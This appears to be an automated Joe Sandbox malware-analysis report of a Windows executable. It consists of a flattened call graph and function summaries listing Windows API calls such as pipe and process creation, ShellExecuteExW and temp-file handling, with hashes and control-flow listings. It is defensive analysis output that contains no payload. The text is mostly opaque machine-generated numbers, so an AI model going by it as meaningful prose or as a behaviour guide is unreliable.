9760 402447 9735->9760 9738 4047cb 9736->9738 9769 40b350 9736->9769 9740 40e5f0 RtlFreeHeap 9738->9740 9741 403ed1 9740->9741 9746 40a200 HeapFree 9741->9746 9742 4047dd 9742->9738 9743 40481d 9742->9743 9780 40b630 9742->9780 9745 40b050 11 API calls 9743->9745 9745->9738 9746->9650 9747->9625 9748->9630 9749->9637 9750->9637 9752 405710 WideCharToMultiByte 9751->9752 9753 40570b 9751->9753 9754 40a220 RtlAllocateHeap 9752->9754 9753->9752 9755 405730 9754->9755 9756 405736 WideCharToMultiByte 9755->9756 9757 401218 9755->9757 9756->9757 9757->9701 9758->9712 9759->9729 9761 405060 2 API calls 9760->9761 9762 402458 9761->9762 9791 40b420 9762->9791 9765 40247f 9767 40e5f0 RtlFreeHeap 9765->9767 9766 40b050 11 API calls 9766->9765 9768 402497 9767->9768 9768->9736 9770 40db18 5 API calls 9769->9770 9771 40b365 9770->9771 9772 40b417 9771->9772 9773 40b36f CreateFileW 9771->9773 9772->9742 9774 40b390 CreateFileW 9773->9774 9775 40b3ac 9773->9775 9774->9775 9777 40b3cd 9774->9777 9776 40b3b9 HeapAlloc 9775->9776 9775->9777 9776->9777 9778 40da8a 4 API calls 9777->9778 9779 40b40e 9777->9779 9778->9779 9779->9742 9781 40b642 9780->9781 9782 40b695 9780->9782 9783 40b68d 9781->9783 9784 40dad9 2 API calls 9781->9784 9782->9743 9783->9743 9785 40b65a 9784->9785 9786 40b683 9785->9786 9787 40b672 WriteFile 9785->9787 9788 40b664 9785->9788 9786->9743 9787->9786 9816 40b6a0 9788->9816 9790 40b66c 9790->9743 9794 40b140 9791->9794 9793 40246b 9793->9765 9793->9766 9795 40b158 9794->9795 9796 40db18 5 API calls 9795->9796 9797 40b16f 9796->9797 9798 40b322 9797->9798 9799 40b182 9797->9799 9800 40b1be 9797->9800 9798->9793 9801 40b199 9799->9801 9802 40b19c CreateFileW 9799->9802 9803 40b1c3 9800->9803 9804 40b1fc 9800->9804 9801->9802 9809 40b268 9802->9809 9805 40b1da 9803->9805 9806 40b1dd CreateFileW 9803->9806 9807 40b227 CreateFileW 9804->9807 9804->9809 9805->9806 9806->9809 9808 40b249 CreateFileW 9807->9808 9807->9809 9808->9809 9810 40b2a2 9809->9810 9812 40b28e HeapAlloc 9809->9812 9813 40b2f0 9809->9813 9810->9813 9814 40b2dc SetFilePointer 9810->9814 9811 40da8a 4 API calls 9811->9798 9812->9810 9813->9811 9815 40b301 9813->9815 9814->9813 9815->9793 9817 40b7a7 9816->9817 9818 40b6ba 9816->9818 9817->9790 9819 40b6c0 SetFilePointer 9818->9819 9820 40b6eb 9818->9820 9819->9820 9822 40b0c0 WriteFile 9820->9822 9824 40b6f7 9820->9824 9821 40b727 9821->9790 9823 40b76e 9822->9823 9823->9824 9825 40b775 WriteFile 9823->9825 9824->9821 9826 40b711 memcpy 9824->9826 9825->9790 9826->9790 9828 40631f 9827->9828 9829 406438 9828->9829 9839 4063ae 9828->9839 9830 40e880 TlsGetValue 9829->9830 9831 406442 9830->9831 9832 40645a 9831->9832 9833 40644a _wcsdup 9831->9833 9834 40e880 TlsGetValue 9832->9834 9833->9832 9835 406460 9834->9835 9836 406477 9835->9836 9837 406468 _wcsdup 9835->9837 9838 40e880 TlsGetValue 9836->9838 9837->9836 9840 406480 9838->9840 9841 4063fc wcsncpy 9839->9841 9843 403ad4 9839->9843 9842 406488 _wcsdup 9840->9842 9845 406498 9840->9845 9841->9839 9842->9845 9843->8893 9844 40e900 3 API calls 9846 406520 9844->9846 9845->9844 9847 406572 wcsncpy 9846->9847 9848 406526 9846->9848 9851 40658d 9846->9851 9847->9851 9849 4065e4 9848->9849 9850 4065db free 9848->9850 9852 4065f7 9849->9852 9853 4065eb free 9849->9853 9850->9849 9851->9848 9855 406625 wcsncpy 9851->9855 9852->9843 9854 4065fe free 9852->9854 9853->9852 9854->9843 9855->9851 9857 40b140 15 API calls 9856->9857 9858 4023eb 9857->9858 9858->9690 9859 40b600 9858->9859 9860 40dad9 2 API calls 9859->9860 9861 40b60f 9860->9861 9862 40b623 9861->9862 9865 40b500 9861->9865 9862->9688 9864 40b620 9864->9688 9866 40b5f4 9865->9866 9867 40b514 9865->9867 9866->9864 9867->9866 9868 40b528 9867->9868 9869 40b58d 9867->9869 9870 40b560 9868->9870 9871 40b538 9868->9871 9883 40b7b0 WideCharToMultiByte 9869->9883 9870->9870 9873 40b56b WriteFile 9870->9873 9876 40b6a0 4 API calls 9871->9876 9873->9864 9874 40b5a7 9875 40b5eb 9874->9875 9877 40b5b7 9874->9877 9878 40b5c8 WriteFile 9874->9878 9875->9864 9880 40b55a 9876->9880 9881 40b6a0 4 API calls 9877->9881 9879 40b5dc HeapFree 9878->9879 9879->9875 9880->9864 9882 40b5c2 9881->9882 9882->9879 9884 40b7d5 HeapAlloc 9883->9884 9885 40b80e 9883->9885 9886 40b809 9884->9886 9887 40b7ec WideCharToMultiByte 9884->9887 9885->9874 9886->9874 9887->9886 9888->8960 9889->8962 9890->8971 9892 4024a3 9891->9892 9892->9892 9893 40e660 21 API calls 9892->9893 9894 4024b5 9893->9894 9895 4051a0 3 API calls 9894->9895 9914 4024be 9895->9914 9896 40253f 9959 40e520 GetLastError TlsGetValue SetLastError 9896->9959 9898 402545 9960 40e520 GetLastError TlsGetValue SetLastError 9898->9960 9899 40e520 GetLastError TlsGetValue SetLastError 9899->9914 9901 40254d GetCommandLineW 9903 40a240 4 API calls 9901->9903 9902 405dc0 3 API calls 9902->9914 9904 40255a 9903->9904 9906 40e560 3 API calls 9904->9906 9905 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9905->9914 9907 402564 9906->9907 9961 40e520 GetLastError TlsGetValue SetLastError 9907->9961 9909 40256e 9911 40e6c0 4 API calls 9909->9911 9910 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 9910->9914 9912 402576 9911->9912 9913 40e560 3 API calls 9912->9913 9915 402580 PathRemoveArgsW 9913->9915 9914->9896 9914->9899 9914->9902 9914->9905 9914->9910 9916 402597 9915->9916 9917 4025fd 9916->9917 9962 40e520 GetLastError TlsGetValue SetLastError 9916->9962 9919 4099a5 SetEnvironmentVariableW 9917->9919 9921 40260a 9919->9921 9920 4025a9 9922 40e6c0 4 API calls 9920->9922 9975 40e520 GetLastError TlsGetValue SetLastError 9921->9975 9924 4025b6 9922->9924 9963 40e520 GetLastError TlsGetValue SetLastError 9924->9963 9925 402614 9927 40e6c0 4 API calls 9925->9927 9929 40261c 9927->9929 9928 4025bc 9964 40e520 GetLastError TlsGetValue SetLastError 9928->9964 9976 405170 TlsGetValue 9929->9976 9932 402623 9935 40e5f0 RtlFreeHeap 9932->9935 9933 4025c4 9965 40e520 GetLastError TlsGetValue SetLastError 9933->9965 9938 40263b 9935->9938 9936 4025cc 9966 40e520 GetLastError TlsGetValue SetLastError 9936->9966 9940 40e5f0 RtlFreeHeap 9938->9940 9939 4025d4 9967 406110 9939->9967 9942 402644 9940->9942 9944 40e5f0 RtlFreeHeap 9942->9944 9943 4025e5 9974 405182 TlsGetValue 9943->9974 9946 40264d 9944->9946 9948 40e5f0 RtlFreeHeap 9946->9948 9947 4025ea 9950 402656 9948->9950 9952 40e5f0 RtlFreeHeap 9950->9952 9954 401eb5 9952->9954 9954->8977 9956->8972 9957->8983 9958->8992 9959->9898 9960->9901 9961->9909 9962->9920 9963->9928 9964->9933 9965->9936 9966->9939 9968 406146 9967->9968 9969 406118 9967->9969 9986 40e9e0 TlsGetValue 9968->9986 9977 406080 9969->9977 9971 40614f 9971->9943 9974->9947 9975->9925 9976->9932 9978 40e880 TlsGetValue 9977->9978 9979 40609c 9978->9979 9980 40e900 3 API calls 9979->9980 9981 4060a8 9980->9981 9986->9971 9989->9012 9990->9018 10091->9103 10092->9107 10093->9102 10094->9106 10095->9110 10096->9114 10097->9118 10393 40a46f HeapAlloc 10392->10393 10394 40a558 10392->10394 10393->7888 10393->7889 10419 40a79a 10394->10419 10396 40a560 10397 40dfc6 9 API calls 10396->10397 10398 40a568 HeapFree HeapFree 10397->10398 10399 40a5a3 HeapFree 10398->10399 10400 40a58f 10398->10400 10399->10393 10401 40a590 HeapFree 10400->10401 10401->10401 10402 40a5a2 10401->10402 10402->10399 10404 40deba 10403->10404 10405 40df72 RtlAllocateHeap 10404->10405 10406 40dec6 10404->10406 10408 40df87 10405->10408 10409 40a4f6 HeapAlloc 10405->10409 10426 40e0c3 LoadLibraryW 10406->10426 10408->10409 10411 40dfb0 InitializeCriticalSection 10408->10411 10409->7888 10411->10409 10412 40deeb 10413 40df07 HeapAlloc 10412->10413 10414 40df65 LeaveCriticalSection 10412->10414 10413->10414 10415 40df1d 10413->10415 10414->10409 10417 40de99 6 API calls 10415->10417 10418 40df34 10417->10418 10418->10414 10423 40a7ae 10419->10423 10420 40a7f7 memset 10421 40a810 10420->10421 10421->10396 10422 40a7b9 HeapFree 10422->10423 10423->10420 10423->10422 10424 41242a RtlFreeHeap 10423->10424 10425 40ddcb 3 API calls 10423->10425 10424->10423 10425->10423 10427 40e0e0 GetProcAddress 10426->10427 10428 40e10b InterlockedCompareExchange 10426->10428 10429 40e100 FreeLibrary 10427->10429 10434 40e0f0 10427->10434 10430 40e11b 10428->10430 10431 40e12f InterlockedExchange 10428->10431 10429->10428 10432 40ded5 EnterCriticalSection 10429->10432 10430->10432 10435 40e120 Sleep 10430->10435 10431->10432 10432->10412 10434->10429 10435->10430 10436->7904 10437->7906 10438->7908 10439->7910 10440->7914 10441->7920 10442->7922 10443->7924 10444->7926 10445->7930 10446->7938 10447->7944 10448->7946 10449->7953 10450->7955 10451->7957 10452->7959 10453->7963 10454->7969 10455->7971 10456->7973 10457->7975 10458->7979 10459->7985 10460->7991 10461->7997 10462->7999 10463->8005 10464->8011 10731 402e03 10732 40e660 21 API calls 10731->10732 10733 402e09 10732->10733 10734 40ab74 5 API calls 10733->10734 10735 402e14 10734->10735 10744 40e520 GetLastError TlsGetValue SetLastError 10735->10744 10737 402e1a 10745 40e520 GetLastError TlsGetValue SetLastError 10737->10745 10739 402e22 10740 40a240 4 API calls 10739->10740 10741 402e2d 10740->10741 10742 40e560 3 API calls 10741->10742 10743 402e3c 10742->10743 10744->10737 10745->10739 10776 406289 10777 406290 10776->10777 10777->10777 10780 40ea90 TlsGetValue 10777->10780 10779 4062b5 10780->10779 10485 40b6a0 10486 40b7a7 10485->10486 10487 40b6ba 10485->10487 10488 40b6c0 SetFilePointer 10487->10488 10489 40b6eb 10487->10489 10488->10489 10491 40b0c0 WriteFile 10489->10491 10493 40b6f7 10489->10493 10490 40b727 10492 40b76e 10491->10492 10492->10493 10494 40b775 WriteFile 10492->10494 10493->10490 10495 40b711 memcpy 10493->10495 10496 40242d 10497 40242f 10496->10497 10498 40e5f0 RtlFreeHeap 10497->10498 10499 402437 10498->10499 10500 40e5f0 RtlFreeHeap 10499->10500 10501 402440 10500->10501

                    Executed Functions

                    Function 00409A1F Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395memorypipesynchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 409a1f-409a88 memset 1 409a9a-409a9b 0->1 2 409a8a-409a98 0->2 3 409aa3-409aac 1->3 2->3 4 409ad5-409ad8 3->4 5 409aae-409ab7 3->5 6 409b20-409b29 4->6 7 409ada-409add 4->7 5->4 8 409ab9-409abe 5->8 10 409bbb-409bc3 6->10 11 409b2f-409b32 6->11 7->6 9 409adf-409af5 CreatePipe 7->9 8->4 12 409ac0-409ad3 8->12 9->6 14 409af7-409b15 call 4099c7 9->14 15 409bc5-409bd2 10->15 16 409c07-409c15 10->16 17 409b34-409b4a CreatePipe 11->17 18 409b75-409b78 11->18 13 409b1d 12->13 13->6 14->13 20 409bd4-409bd8 GetStdHandle 15->20 21 409bdf-409be6 15->21 22 409c17 16->22 23 409c19-409c20 16->23 17->18 24 409b4c-409b6d call 4099c7 17->24 18->10 25 409b7a-409b90 CreatePipe 18->25 20->21 27 409bf3-409bfa 21->27 28 409be8-409bec GetStdHandle 21->28 22->23 30 409c22 23->30 31 409c29-409c62 wcslen * 2 HeapAlloc 23->31 24->18 25->10 32 409b92-409bb3 call 4099c7 25->32 27->16 34 409bfc-409c00 GetStdHandle 27->34 28->27 30->31 36 409c64-409c84 wcscpy wcscat * 2 31->36 37 409c86-409c8e wcscpy 31->37 32->10 34->16 38 409c8f-409c9b 36->38 37->38 40 409cba-409cc3 38->40 41 409c9d-409cb8 wcscat * 2 38->41 42 409cd5-409cf2 CreateProcessW 40->42 43 409cc5-409cce 40->43 41->40 44 409cf8-409d02 42->44 45 409d9e-409da8 42->45 43->42 48 409d04-409d08 CloseHandle 44->48 49 409d0a-409d0e 44->49 46 409db0-409db4 45->46 47 409daa-409dae CloseHandle 45->47 50 409db6-409dba CloseHandle 46->50 51 409dbc-409dc0 46->51 47->46 48->49 52 409d10-409d14 CloseHandle 49->52 53 409d16-409d1a 49->53 50->51 54 409dc2-409dc6 CloseHandle 51->54 55 409dc8-409dcc 51->55 52->53 56 409d22-409d32 CloseHandle 53->56 57 409d1c-409d20 CloseHandle 53->57 54->55 58 409dd4-409dd8 55->58 59 409dce-409dd2 CloseHandle 55->59 60 409d40-409d44 56->60 61 409d34-409d3a WaitForSingleObject 56->61 57->56 62 409de0-409de4 58->62 63 409dda-409dde CloseHandle 58->63 59->58 64 409d93-409d99 CloseHandle 60->64 65 409d46-409d8e EnterCriticalSection call 40e1f2 LeaveCriticalSection 60->65 61->60 67 409de6-409dea CloseHandle 62->67 68 409dec-409df4 62->68 63->62 66 409f27-409f29 64->66 71 409f2a 65->71 66->71 67->68 68->71 72 409dfa-409e01 68->72 75 409f2c-409f49 HeapFree 71->75 73 409e03-409e12 wcslen 72->73 74 409e47-409ebb memset ShellExecuteExW 72->74 73->74 76 409e14-409e18 73->76 74->71 77 409ebd-409ec7 74->77 78 409e21-409e23 76->78 79 409e1a-409e1f 76->79 80 409ed8-409edc 77->80 81 409ec9-409ed2 WaitForSingleObject 77->81 78->74 82 409e25-409e42 wcscpy 78->82 79->76 79->78 83 409f1e-409f25 CloseHandle 80->83 84 409ede-409f1c EnterCriticalSection call 40e1f2 LeaveCriticalSection 80->84 81->80 82->74 83->66 84->75
                    APIs
                    • memset.MSVCRT ref: 00409A69
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
                    • GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
                    • GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
                    • GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
                    • wcslen.MSVCRT ref: 00409C2A
                    • wcslen.MSVCRT ref: 00409C38
                    • HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
                    • wcscpy.MSVCRT ref: 00409C6A
                    • wcscat.MSVCRT ref: 00409C71
                    • wcscat.MSVCRT ref: 00409C7C
                    • wcscpy.MSVCRT ref: 00409C88
                    • wcscat.MSVCRT ref: 00409CA3
                    • wcscat.MSVCRT ref: 00409CB0
                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
                    • EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
                    • LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
                    • wcslen.MSVCRT ref: 00409E04
                    • wcscpy.MSVCRT ref: 00409E2A
                    • memset.MSVCRT ref: 00409E56
                    • ShellExecuteExW.SHELL32 ref: 00409EB3
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
                    • EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
                    • LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                      • Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                      • Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    • HeapFree.KERNEL32(00000000,?), ref: 00409F37
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                    • String ID: $0A$x
                    • API String ID: 550696126-3693508903
                    • Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
                    • Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
                    • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
                    • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                    • String ID: $pA$$pA$$pA$$pA
                    • API String ID: 368575804-1531182785
                    • Opcode ID: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
                    • Opcode Fuzzy Hash: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040100F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                    • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                      • Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                      • Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                      • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                      • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                      • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                      • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                      • Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                    • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0
                      • Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                      • Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                      • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                      • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                    • HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
                    • ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonConsoleControlsCtrlDestroyEnumExitHandlerInitLoadModuleProcessResourceTypes
                    • String ID: .pA$:pA$|pA
                    • API String ID: 1832782000-3272395972
                    • Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
                    • Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ADD6 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
